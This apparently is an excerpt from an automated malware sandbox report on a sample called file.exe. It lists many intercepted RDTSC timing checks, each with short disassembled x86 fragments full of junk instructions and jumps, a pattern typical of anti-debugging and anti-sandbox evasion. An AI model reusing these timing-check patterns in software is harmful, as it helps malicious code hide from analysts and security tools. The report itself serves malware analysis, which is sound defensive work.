              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16968 second address: D169B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D1842h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F11A0E03018h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b and edi, 69666EA5h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 jbe 00007F11A0E03018h 0x0000003a pop ebx 0x0000003b push eax 0x0000003c push ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f push ebx 0x00000040 pop ebx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1362E second address: D13634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1267F second address: D1270E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a js 00007F11A0E03016h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F11A0E03022h 0x0000001b popad 0x0000001c popad 0x0000001d nop 0x0000001e mov di, 804Ah 0x00000022 push dword ptr fs:[00000000h] 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F11A0E03018h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a jmp 00007F11A0E0301Ah 0x0000004f mov bh, 4Ah 0x00000051 mov eax, dword ptr [ebp+122D1495h] 0x00000057 mov ebx, dword ptr [ebp+122D2A53h] 0x0000005d push FFFFFFFFh 0x0000005f jmp 00007F11A0E0301Eh 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13634 second address: D13655 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F11A12050B6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1270E second address: D12714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B1E second address: D16B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B24 second address: D16B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B28 second address: D16B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edi, dword ptr [ebp+122D38F9h] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f add dword ptr [ebp+122D1AC1h], esi 0x00000025 call 00007F11A12050C1h 0x0000002a pop ebx 0x0000002b mov eax, dword ptr [ebp+122D0FA1h] 0x00000031 mov edi, dword ptr [ebp+122D2439h] 0x00000037 push FFFFFFFFh 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F11A12050B8h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 mov di, 930Fh 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B98 second address: D16BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A1057FABh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16BA8 second address: D16BCC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F11A12050B8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F11A12050C5h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16BCC second address: D16BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20E49 second address: D20E54 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20E54 second address: D20E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20E5E second address: D20E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F11A12050C9h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F11A12050B6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20631 second address: D20637 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20637 second address: D2064E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jo 00007F11A12050B6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2064E second address: D20668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11A1057FB3h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D207CC second address: D207D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D207D2 second address: D207E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jnl 00007F11A1057FA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2524A second address: D2526F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jnp 00007F11A12050BAh 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d jc 00007F11A12050BCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D254D7 second address: B4FA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 561F878Fh 0x0000000c stc 0x0000000d push dword ptr [ebp+122D1019h] 0x00000013 jnc 00007F11A1057FADh 0x00000019 jp 00007F11A1057FA7h 0x0000001f ja 00007F11A1057FAEh 0x00000025 jne 00007F11A1057FA8h 0x0000002b call dword ptr [ebp+122D23ABh] 0x00000031 pushad 0x00000032 mov dword ptr [ebp+122D2452h], edi 0x00000038 xor eax, eax 0x0000003a clc 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f mov dword ptr [ebp+122D2452h], ecx 0x00000045 mov dword ptr [ebp+122D395Dh], eax 0x0000004b sub dword ptr [ebp+122D1838h], esi 0x00000051 mov dword ptr [ebp+122D1838h], ebx 0x00000057 mov esi, 0000003Ch 0x0000005c pushad 0x0000005d add dword ptr [ebp+122D1838h], esi 0x00000063 popad 0x00000064 xor dword ptr [ebp+122D2452h], edi 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e pushad 0x0000006f adc di, 8B14h 0x00000074 or bh, 00000017h 0x00000077 popad 0x00000078 mov dword ptr [ebp+122D1838h], ecx 0x0000007e lodsw 0x00000080 add dword ptr [ebp+122D1838h], edi 0x00000086 clc 0x00000087 add eax, dword ptr [esp+24h] 0x0000008b pushad 0x0000008c mov esi, dword ptr [ebp+122D374Dh] 0x00000092 mov dword ptr [ebp+122D19F6h], eax 0x00000098 popad 0x00000099 mov ebx, dword ptr [esp+24h] 0x0000009d jmp 00007F11A1057FB5h 0x000000a2 push eax 0x000000a3 push eax 0x000000a4 push edx 0x000000a5 jnc 00007F11A1057FA8h 0x000000ab rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3561 second address: CC3565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3565 second address: CC358E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A1057FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F11A1057FB4h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC358E second address: CC3593 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3593 second address: CC3599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A105 second address: D2A127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F11A12050BFh 0x0000000d popad 0x0000000e jo 00007F11A12050BEh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A6DC second address: D2A6E8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F11A1057FAEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A6E8 second address: D2A6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007F11A12050B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A834 second address: D2A839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A839 second address: D2A875 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C4h 0x00000007 push ebx 0x00000008 jmp 00007F11A12050C6h 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F11A12050B6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A875 second address: D2A87D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A87D second address: D2A882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AC7F second address: D2AC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AF61 second address: D2AF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AF67 second address: D2AF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AF6B second address: D2AFBC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11A12050B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F11A12050BEh 0x00000010 jc 00007F11A12050B6h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d jmp 00007F11A12050BAh 0x00000022 jmp 00007F11A12050BAh 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a jns 00007F11A12050BCh 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F11A12050BFh 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AFBC second address: D2AFC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B116 second address: D2B11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B29A second address: D2B2BA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11A1057FA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jnc 00007F11A1057FA6h 0x00000013 jmp 00007F11A1057FACh 0x00000018 pop ebx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EE8B second address: D2EE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30622 second address: D30626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30626 second address: D3062C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9862 second address: CF9870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A1057FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9BF2 second address: CF9BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9E35 second address: CF9E5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F11A1057FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b xchg eax, esi 0x0000000c mov dword ptr [ebp+122D27B6h], ecx 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F11A1057FB5h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA08F second address: CFA094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA179 second address: CFA17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA17D second address: CFA219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F11A12050BBh 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F11A12050B8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b call 00007F11A12050C9h 0x00000030 mov dword ptr [ebp+122D19F6h], edi 0x00000036 pop edx 0x00000037 push 00000004h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F11A12050B8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 nop 0x00000054 jng 00007F11A12050D4h 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F11A12050C6h 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA634 second address: CFA638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA638 second address: CFA64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jo 00007F11A12050B6h 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA64A second address: CFA695 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F11A1057FA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b movzx ecx, di 0x0000000e push 0000001Eh 0x00000010 jng 00007F11A1057FABh 0x00000016 call 00007F11A1057FB8h 0x0000001b sbb dx, A4DDh 0x00000020 pop ecx 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F11A1057FADh 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA695 second address: CFA6BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11A12050BCh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA9DC second address: CFA9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAAF1 second address: CE1FB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c jmp 00007F11A12050C7h 0x00000011 pop esi 0x00000012 nop 0x00000013 cmc 0x00000014 call dword ptr [ebp+122D28D3h] 0x0000001a push ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1FB9 second address: CE1FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34226 second address: D34247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F11A12050C3h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34247 second address: D34253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop esi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34384 second address: D343A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C6h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3455F second address: D34570 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11A1057FACh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34570 second address: D345A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F11A12050B6h 0x0000000a jmp 00007F11A12050C0h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F11A12050C7h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D345A8 second address: D345CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A1057FB3h 0x00000009 jmp 00007F11A1057FB0h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34753 second address: D34757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34757 second address: D34765 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11A1057FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34765 second address: D34769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34769 second address: D3478C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A1057FB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3478C second address: D3479F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F11A12050BEh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB95F6 second address: CB9611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F11A1057FAFh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F026 second address: D3F02A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F02A second address: D3F032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F032 second address: D3F03F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F03F second address: D3F044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F044 second address: D3F049 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D949 second address: D3D965 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F11A1057FB1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D965 second address: D3D97D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F11A12050BEh 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D97D second address: D3D983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DAF5 second address: D3DAFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DAFA second address: D3DB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jl 00007F11A1057FBBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DB09 second address: D3DB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A12050BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F11A12050E8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F11A12050C0h 0x00000018 jnc 00007F11A12050B6h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3DB3C second address: D3DB42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
